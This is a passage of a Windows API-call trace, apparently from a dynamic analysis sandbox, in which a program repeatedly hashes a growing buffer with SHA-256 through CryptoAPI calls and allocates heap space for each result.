	[0217.051] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.051] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0217.051] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc260
	[0217.051] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc260, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc260, pdwDataLen=0x1284a8) returned 1
	[0217.051] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.051] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.051] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.052] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.052] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0217.052] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc328
	[0217.052] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cc328, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc328, pdwDataLen=0x1284a8) returned 1
	[0217.052] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.052] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.052] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.052] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.052] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0217.052] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc1e8
	[0217.052] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc1e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc1e8, pdwDataLen=0x1284a8) returned 1
	[0217.052] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.052] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.052] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.053] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.053] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0217.053] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc238
	[0217.053] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cc238, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc238, pdwDataLen=0x1284a8) returned 1
	[0217.053] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.053] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.053] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.053] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.053] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0217.053] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc418
	[0217.053] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc418, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc418, pdwDataLen=0x1284a8) returned 1
	[0217.053] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.053] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.053] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.054] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.054] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0217.054] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb9a0
	[0217.054] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cb9a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb9a0, pdwDataLen=0x1284a8) returned 1
	[0217.054] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.054] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.054] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.054] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.054] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0217.054] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb9c8
	[0217.054] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cb9c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb9c8, pdwDataLen=0x1284a8) returned 1
	[0217.054] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.054] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.054] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.055] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.055] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0217.055] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc5f8
	[0217.055] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cc5f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc5f8, pdwDataLen=0x1284a8) returned 1
	[0217.055] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.055] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.055] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.055] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.055] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0217.055] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc698
	[0217.055] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc698, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cc698, pdwDataLen=0x1284a8) returned 1
	[0217.055] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.055] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.055] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.056] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.056] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0217.056] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb8d8
	[0217.056] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x26cb8d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb8d8, pdwDataLen=0x1284a8) returned 1
	[0217.056] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.056] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.056] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.056] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.056] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0217.056] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcb08
	[0217.056] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x22fcb08, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x22fcb08, pdwDataLen=0x1284a8) returned 1
	[0217.056] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.056] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.056] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.057] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.057] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0217.057] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263820
	[0217.057] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x263820, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x263820, pdwDataLen=0x1284a8) returned 1
	[0217.057] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.057] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.057] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.057] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.057] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0217.057] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b37c0
	[0217.057] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b37c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26b37c0, pdwDataLen=0x1284a8) returned 1
	[0217.057] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.057] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.057] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.058] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.058] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0217.058] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27365a8
	[0217.058] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27365a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27365a8, pdwDataLen=0x1284a8) returned 1
	[0217.058] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.058] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.058] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.058] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.058] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0217.058] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27365d0
	[0217.058] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27365d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27365d0, pdwDataLen=0x1284a8) returned 1
	[0217.058] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.058] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.058] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.059] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.059] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0217.059] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27365f8
	[0217.059] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27365f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27365f8, pdwDataLen=0x1284a8) returned 1
	[0217.059] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.059] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.059] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.060] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.060] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0217.060] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736620
	[0217.060] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736620, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736620, pdwDataLen=0x1284a8) returned 1
	[0217.060] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.060] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.060] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.060] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.060] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0217.060] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736648
	[0217.060] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736648, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736648, pdwDataLen=0x1284a8) returned 1
	[0217.060] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.060] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.060] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.061] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.061] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0217.061] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736670
	[0217.061] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736670, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736670, pdwDataLen=0x1284a8) returned 1
	[0217.061] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.061] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.061] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.061] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.061] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0217.061] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736698
	[0217.061] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736698, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736698, pdwDataLen=0x1284a8) returned 1
	[0217.061] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.061] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.061] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.062] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.062] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0217.062] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27366c0
	[0217.062] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27366c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27366c0, pdwDataLen=0x1284a8) returned 1
	[0217.062] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.062] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.062] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.062] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.062] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0217.062] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27366e8
	[0217.062] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27366e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27366e8, pdwDataLen=0x1284a8) returned 1
	[0217.062] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.062] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.062] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.063] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.063] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0217.063] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736710
	[0217.063] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736710, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736710, pdwDataLen=0x1284a8) returned 1
	[0217.063] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.063] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.063] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.063] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.063] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0217.063] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736738
	[0217.063] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736738, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736738, pdwDataLen=0x1284a8) returned 1
	[0217.063] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.063] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.063] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.064] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.064] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0217.064] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736760
	[0217.064] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736760, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736760, pdwDataLen=0x1284a8) returned 1
	[0217.064] CryptDestroyHash (hHash=0x22b6ac0) returned 1
